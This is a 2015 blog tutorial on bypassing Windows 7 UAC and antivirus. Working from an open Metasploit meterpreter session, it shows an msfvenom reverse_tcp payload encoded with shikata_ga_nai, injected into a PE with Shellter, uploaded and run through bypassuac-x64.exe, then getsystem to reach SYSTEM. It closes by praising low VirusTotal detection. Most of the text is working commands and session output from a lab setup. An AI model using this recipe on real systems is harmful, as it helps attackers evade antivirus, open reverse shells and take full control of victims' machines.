Bypass UAC and AV on Windows 7
Date: April 18, 2015
It's being a long time since I wrote my last tutorial, so I'm coming back folks with a new one that implements some basic penetration techniques like msfconsole and introducing a couple of amazing tools for our purpose such as Shellter.
Some intro about Shellter.
Shellter is a dynamic shellcode injection tool, and probably the first dynamic PE infector ever created. It can be used in order to inject shellcode into native Windows applications (currently 32-bit apps only).
The shellcode can be something yours or something generated through a framework, such as Metasploit.
Shellter takes advantage of the original structure of the PE file and doesn’t apply any modification such as changing memory access permissions in sections (unless the user wants), adding an extra section with RWE access,and whatever would look dodgy under an AV scan.
You can find more information about Shellter and some very nice tutorials that have been created by my friend @kyREcon in the official page from where you can download it for both Windows and Linux platforms.
(Note: For the Purpose of this tutorial BackBox (Based on Ubuntu) as OS, the latest installation updates of Windows 7 SP1 OS's will be used)
No more talks! Let's start.
Windows SP1
We assumed that we have exploit our target machine and we have an open session.
Active sessions =============== Id Type Information Connection -- ---- ----------- ---------- 3 meterpreter x86/win32 PC-LAB\wizard32 @ PC-LAB 192.168.1.25:4443 -> 192.168.1.25:47955 (10.0.2.15)
Interacting with our session we can identify that we are running on Windows 7 SP1 with low privileges (main user privileges).
meterpreter > sysinfo Computer : PC-LAB OS : Windows 7 (Build 7601, Service Pack 1). Architecture : x64 (Current Process is WOW64) System Language : en_US Meterpreter : x86/win32 meterpreter > run post/windows/gather/win_privs Current User ============ Is Admin Is System UAC Enabled Foreground ID UID -------- --------- ----------- ------------- --- False False True 1 "PC-LAB\\wizard32"
If we try to get the high privileges we are retrieving the following error because UAC preventing us of running not authorized processes.
meterpreter > getsystem [-] priv_elevate_getsystem: Operation failed: The environment is incorrect.
Metasploit provides an exploit in order to bypass the UAC controller but as I can see our exploit is been captured from Microsoft Security Essentials as Trojan:Win32/Swrort.A
and our exploit is failing due to this prevention.
msf exploit(bypassuac) > exploit [*] Started reverse handler on 192.168.1.25:4444 [*] UAC is Enabled, checking level... [+] UAC is set to Default [+] BypassUAC can bypass this setting, continuing... [+] Part of Administrators group! Continuing... [*] Uploaded the agent to the filesystem.... [*] Uploading the bypass UAC executable to the filesystem... [*] Meterpreter stager executable 73802 bytes long being uploaded.. [-] Exploit failed [timeout-expired]: Timeout::Error execution expired
Now it's time Shellter to take part for this purpose. For the simplicity of this tutorial I will explain how to create the payload using the Basic option that Shellter provides. If you already checked the official page of it you know that Shellter can provide more expert ways and of course some nice video tutorials "How to do it".
The process that I followed is outlining bellow:
Create the payload raw file
sudo msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 3 --platform win LHOST=192.168.1.25 LPORT=4433 -f raw > ~/Downloads/pldwiz
Generate the executable file with Shellter and provide the payload
Now let's go back to our our open session and upload the file that Shellter created and also the ByPassUAC.exe that Metasploit provide for us.
meterpreter > upload labwiz.exe [*] uploading : labwiz.exe -> labwiz.exe [*] uploaded : labwiz.exe -> labwiz.exe meterpreter > upload bypassuac-x64.exe [*] uploading : bypassuac-x64.exe -> bypassuac-x64.exe [*] uploaded : bypassuac-x64.exe -> bypassuac-x64.exe
So, lets configure the new listener for our payload and fire up the metasploit again to see if finally we will have access.
msf exploit(handler) > exploit [*] Started reverse handler on 192.168.1.25:4433 [*] Starting the payload handler...
From our opened session it's time to trigger our payload through the executable. So run the following command from shell prompt:
meterpreter > shell Process 3592 created. Channel 2 created. Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation. All rights reserved. C:\Users\wizard32\> bypassuac-x64.exe elevate /c C:\Users\wizard32\Documents\labwiz.exe
and voilà
[*] Sending stage (785920 bytes) to 192.168.1.25 [*] Meterpreter session 1 opened (192.168.1.25:4433 -> 192.168.1.25:47226) at 2015-04-18 14:44:32 +0200 meterpreter >
Let's try to get the high privileges into the machine which is System and not Admin (be careful on it!)
meterpreter > getsystem ...got system (via technique 1). meterpreter > getuid Server username: NT AUTHORITY\SYSTEM
Checking our executable payload on VirusTotal we got a really nice results:
Of course using more advanced techniques we can minimize the inspection ratio of our payload but during this tutorial we discover some basic commands retrieving useful information about our target and the power of creating undetectable executable payload using Shellter and the way to get the highest privileges on a Windows system.